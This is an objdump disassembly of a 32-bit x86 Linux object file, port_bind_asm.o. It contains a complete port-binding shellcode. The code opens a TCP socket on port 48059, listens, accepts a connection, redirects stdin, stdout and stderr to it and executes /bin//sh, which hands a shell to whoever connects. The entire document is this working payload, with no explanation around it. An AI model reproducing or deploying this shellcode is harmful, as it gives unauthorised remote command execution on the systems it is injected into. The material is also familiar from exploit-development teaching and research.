
port_bind_asm.o:     file format elf32-i386


Disassembly of section .text:

00000000 <_start>:
   0:	31 c0                	xor    %eax,%eax
   2:	31 db                	xor    %ebx,%ebx
   4:	31 d2                	xor    %edx,%edx
   6:	50                   	push   %eax
   7:	6a 01                	push   $0x1
   9:	6a 02                	push   $0x2
   b:	89 e1                	mov    %esp,%ecx
   d:	fe c3                	inc    %bl
   f:	b0 66                	mov    $0x66,%al
  11:	cd 80                	int    $0x80
  13:	89 c6                	mov    %eax,%esi
  15:	52                   	push   %edx
  16:	68 bb 02 bb bb       	push   $0xbbbb02bb
  1b:	89 e1                	mov    %esp,%ecx
  1d:	6a 10                	push   $0x10
  1f:	51                   	push   %ecx
  20:	56                   	push   %esi
  21:	89 e1                	mov    %esp,%ecx
  23:	fe c3                	inc    %bl
  25:	b0 66                	mov    $0x66,%al
  27:	cd 80                	int    $0x80
  29:	52                   	push   %edx
  2a:	56                   	push   %esi
  2b:	89 e1                	mov    %esp,%ecx
  2d:	b3 04                	mov    $0x4,%bl
  2f:	b0 66                	mov    $0x66,%al
  31:	cd 80                	int    $0x80
  33:	52                   	push   %edx
  34:	52                   	push   %edx
  35:	56                   	push   %esi
  36:	89 e1                	mov    %esp,%ecx
  38:	fe c3                	inc    %bl
  3a:	b0 66                	mov    $0x66,%al
  3c:	cd 80                	int    $0x80
  3e:	89 c3                	mov    %eax,%ebx
  40:	31 c9                	xor    %ecx,%ecx
  42:	b0 3f                	mov    $0x3f,%al
  44:	cd 80                	int    $0x80
  46:	41                   	inc    %ecx
  47:	b0 3f                	mov    $0x3f,%al
  49:	cd 80                	int    $0x80
  4b:	41                   	inc    %ecx
  4c:	b0 3f                	mov    $0x3f,%al
  4e:	cd 80                	int    $0x80
  50:	52                   	push   %edx
  51:	68 2f 2f 73 68       	push   $0x68732f2f
  56:	68 2f 62 69 6e       	push   $0x6e69622f
  5b:	89 e3                	mov    %esp,%ebx
  5d:	52                   	push   %edx
  5e:	53                   	push   %ebx
  5f:	89 e1                	mov    %esp,%ecx
  61:	b0 0b                	mov    $0xb,%al
  63:	cd 80                	int    $0x80
  65:	31 c0                	xor    %eax,%eax
  67:	31 db                	xor    %ebx,%ebx
  69:	b0 01                	mov    $0x1,%al
  6b:	cd 80                	int    $0x80
